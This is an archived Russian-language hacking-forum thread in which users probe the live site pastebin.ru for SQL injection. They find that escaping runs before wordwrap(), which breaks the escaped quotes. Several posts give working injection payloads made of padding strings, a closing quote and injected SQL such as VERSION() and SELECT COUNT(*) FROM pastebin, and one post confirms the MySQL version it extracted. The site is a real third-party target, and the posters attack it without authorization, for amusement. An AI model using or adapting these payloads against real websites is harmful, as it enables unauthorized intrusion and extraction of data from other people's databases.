PDA

Просмотр полной версии : Давайте хекнем pastebin.ru


Ponchik
25.04.2009, 14:18
:D
В общем хотел запостить туда скриптег, а он мне MySQL error кинул, ну поудаляв куски кода, понял ато у него аллергия на этот код
чё тут было неважно :)
Query failure: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '; ?>',303345)' at line 1
insert into pastebin (poster, posted, code, parent_pid) values ('Гость',now(),'',303345);
да, тут INSERT но если найти на сто имено он реагирует, малоли... У меня не получается понятб что имено ему ненравится

Ponchik
25.04.2009, 14:25
АГА!!! Я ПОНЯЛ!!!
Щас раскажу :))
Тама чтобы код не разъежал сайт его режут, токо тама сначало идёт экранирование, потом режут, хы хы (кстате надо у себя проверить такую уязвимость)
И такой код
a''''''''''''''''''''''''''''''''''''''''''''''''' '''''''''''''''''''''''''''''''''''''''''''''''''
Тоже вызывает SQL Inj :D
Получается ...\'\'\'\'\<перенос>'\'\'\'
Токо походу ничё с этим не сделать интересного :)
Нате, вот
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbb bbbbbbbbbbbbbbbbbbbbaaaaaaaaa'a
P.S. Прикольно, у мя тоже такая дыра на сайте есть :(
Пойду фиксить

ShAnKaR
25.04.2009, 17:12
Токо походу ничё с этим не сделать интересного :)

почему нельзя - скуль же полноценная а в insert можно подряд несколько значений вставлять- тоесть можем результат любого запроса вывести через подзапросы.
PS мне больше нравится pastebin.com

Ponchik
25.04.2009, 18:15
zlo12, да нет, тут были месаги но их потёрли
Получается я новый вид SQL inj уязвимостей нащёл? :DDD
wordwrap() зло
ShAnKaR, ну чтоб закрыть запрос нужна ещё одна ковычка, а она получится только с слэшем \ ну вобще если мозг помучать то может чёнибудь и получится...
P.S. А ведь ачать тоже режет так месаги О_о Хммм...
Хы, тут правильно, сначала wordwrap потом экранирование :(

root_sashok
25.04.2009, 18:29
зачем собственно его хакать?

Ponchik
25.04.2009, 18:32
Хотя вот....
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbb babbbbbbbbbbbbbbbbbbbaaaaaaaa',QUERY)/*
Это поле parent_pid, токо оно по поду никуда не выводится...

FALTONICK
25.04.2009, 18:33
зачем собственно его хакать?
чтоб было!

Ponchik
25.04.2009, 18:43
ЕСТЬ!1111
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbb babbbbbbbbbbbbbbbbbbbaaaaaaaa'+VERSION(),1)/*
Версия 4.1

[Raz0r]
25.04.2009, 18:46
Получается я новый вид SQL inj уязвимостей нащёл? :DDD

боян
http://forum.antichat.ru/showpost.php?p=911841&postcount=2
http://forum.antichat.ru/showpost.php?p=970729&postcount=3

Ponchik
25.04.2009, 18:47
Чёто непонимаю чё он от мя хочет
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbb babbbbbbbbbbbbbbbbbbbaaaaaaaa'+(SELECT COUNT(*) FROM pastebin),1)/*
[Raz0r], фигово... Ну тогда я в контру